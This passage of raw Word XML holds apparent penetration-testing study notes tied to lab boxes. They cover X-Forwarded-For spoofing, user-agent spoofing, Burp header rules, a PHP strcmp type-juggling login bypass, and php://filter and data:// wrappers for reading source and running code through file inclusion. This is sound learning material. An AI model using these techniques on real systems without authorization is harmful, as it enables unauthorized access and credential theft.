      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> connecting to a web server.</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So in the post request, just add: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="117"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">X-Forwarded-For: 10.10.10.10</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003C6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2559489" cy="1379965"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="231" name="image221.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image221.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2559489" cy="137996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9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mpadhrxm038l" w:id="23"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to view pages as a search engine</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In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId47">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Inclusiveness</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pg play, we saw that a webpage (robots.txt) said that we can only view the page as a "search engine." So, in order to pretend to be a search engine, we can create a custom user agent named GoogleBot for the search engine.</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color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo curl -s -- user-agent Googlebot http://192.168.128.14/robots. txt -v</w:t>
      </w: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1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_iq1r15tr2i34" w:id="24"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Burpsuite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2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_w9jh21fglol" w:id="25"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to automate adding HTTP headers on Burpsuite</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In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId48">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Robust</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice, we were going to be sending a lot of HTTP requests via burpsuite, but the only way to access the website was</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> by adding the "X-Forwarded-For" header. And also we wanted to remove the "Location: login.php" header too</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. So instead of manually adding that every time, we automated it using settings in Burpsuite</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2578100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="400" name="image400.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image400.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId4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spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To make sure we get access to every request, we can add the X-Forwarded-For header to every request we send to the server. Simply click the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'Add' </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">button and enter the header details.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003DA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3322235" cy="1676642"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="536" name="image539.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image539.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3322235" cy="1676642"/>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Next, below shows an example of how to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">remove </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a header that the server has sent as part of a response. This Location header will now be empty when the browser receives it. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003DD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3368718" cy="1700101"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="139" name="image148.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image148.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3368718" cy="1700101"/>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ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003DF">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003E0">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1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vctoh0dtqc19" w:id="26"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP</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2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_x4h38rpx0w59" w:id="27"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">strcmp() bypass with PHP Type Juggling</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This is from the </w:t>
      </w:r>
      <w:hyperlink r:id="rId52">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Potato</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> from PG Play</w:t>
      </w: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In this box, we had authentication with an admin PHP page that had this line:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="419"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">strcmp($_POST['password'], $pass) = 0</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Here, we can bypass strcmp to make it return NULL, and since NULL = 0 in PHP, then this all returns True, allowing us to get logged in.</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1100"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, we have to submit something on the form, for example put "mike" as the password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1100"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then intercept the POST request and you should see "password=mike" in the request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1100"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then change it to "password[]=mike", and you can actually replace "mike" with anything</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1100"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then this turns "password" into an array, and this makes strcmp return NULL, which results in the code looking like NULL = 0, which is true, so then we successfully did strcmp bypass</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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_e4melwu1cnq2" w:id="28"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP Wrappers (from OSCP 9.2.2. PHP Wrappers)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PHP Base64 wrapper was used in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId53">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Zipper</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PHP Wrappers (specifically</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> data://</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) can get you code execution for PHP sites</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1475"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What's the catch? It's not allowed by default. You need </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">allow_url_include</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to be enabled </w:t>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And the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> php://filter/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> can do stuff like base64 encoding which ends up showing us more information than normal. It shows php pages but with more info than normal. </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PHP offers a variety of protocol wrappers to enhance the language's capabilities. For example, PHP wrappers can be used to represent and access local or remote filesystems. We can use these wrappers to bypass filters or obtain code execution via File Inclusion vulnerabilities in PHP web applications. While we'll only examine the php://filter and data:// wrappers, many are available.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We can use the php://filter wrapper to display the contents of files either with or without encodings like ROT13 or Base64. In the previous section, we covered using LFI to include the contents of files. Using php://filter, we can also display the contents of executable files such as .php, rather than executing them. This allows us to review PHP files for sensitive information and analyze the web application's logic.</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Let's demonstrate this by revisiting the "Mountain Desserts" web application. First, we'll provide the admin.php file as a value for the "page" parameter, as in the last Learning Unit.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2501900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="441" name="image426.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image426.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5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Listing 21 shows the title and maintenance text we already encountered while reviewing the web application earlier. We also notice that the &lt;body&gt; tag is not closed at the end of the HTML code. We can assume that something is missing. PHP code will be executed server side and, as such, is not shown. When we compare this output with previous inclusions or review the source code in the browser, we can conclude that the rest of the index.php page's content is missing.</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Next, let's include the file, using php://filter to better understand this situation. We will not use any encoding on our first attempt. The PHP wrapper uses resource as the required parameter to specify the file stream for filtering, which is the filename in our case. We can also specify absolute or relative paths in this parameter.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2705100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="160" name="image165.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image165.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5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The output of Listing 22 shows the same result as Listing 21. This makes sense since the PHP code is included and executed via the LFI vulnerability. Let's now encode the output with base64 by adding convert.base64-encode. This converts the specified resource to a base64 string.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000040A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1892300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="461" name="image453.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image453.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5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Listing 23 shows that we included base64 encoded data, while the rest of the page loaded correctly. We can now use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">base64</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> program with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-d</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag to decode the encoded data in the terminal.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="5410200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="76"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The decoded data contains MySQL connection information, including a username and password. We can use these credentials to connect to the database or try the password for user accounts via SSH.</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While the php://filter wrapper can be used to include the contents of a file, we can use the data:// wrapper to achieve code execution. This wrapper is used to embed data elements as plaintext or base64-encoded data in the running web application's code. This offers an alternative method when we cannot poison a local file with PHP code.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Let's demonstrate how to use the data:// wrapper with the "Mountain Desserts" web application. To use the wrapper, we'll add data:// followed by the data type and content. In our first example, we will try to embed a small URL-encoded PHP snippet into the web application's code. We can use the same PHP snippet as previously with ls the command.</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2324100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="447" name="image431.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image431.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 25 shows that our embedded data was successfully executed via the File Inclusion vulnerability and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">data://</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> wrapper.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000418">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When web application firewalls or other security mechanisms are in place, they may filter strings like "system" or other PHP code elements. In such a scenario, we can try to use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">data://</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> wrapper with base64-encoded data. We'll first encode the PHP snippet into base64, then use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to embed and execute it via the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">data://</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> wrapper.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000419">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3327400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="255" name="image244.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image244.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5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Listing 26 shows that we successfully achieved code execution with the base64-encoded PHP snippet. This is a handy technique that may help us bypass basic filters. However, we need to be aware that the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">data://</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> wrapper will not work in a default PHP installation. To exploit it, the</w:t>
      </w:r>
      <w:hyperlink r:id="rId60">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId61">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">allow_url_include</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> setting needs to be enabled.</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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_23ii481iiixl" w:id="29"/>
      <w:bookmarkEnd w:id="29"/>
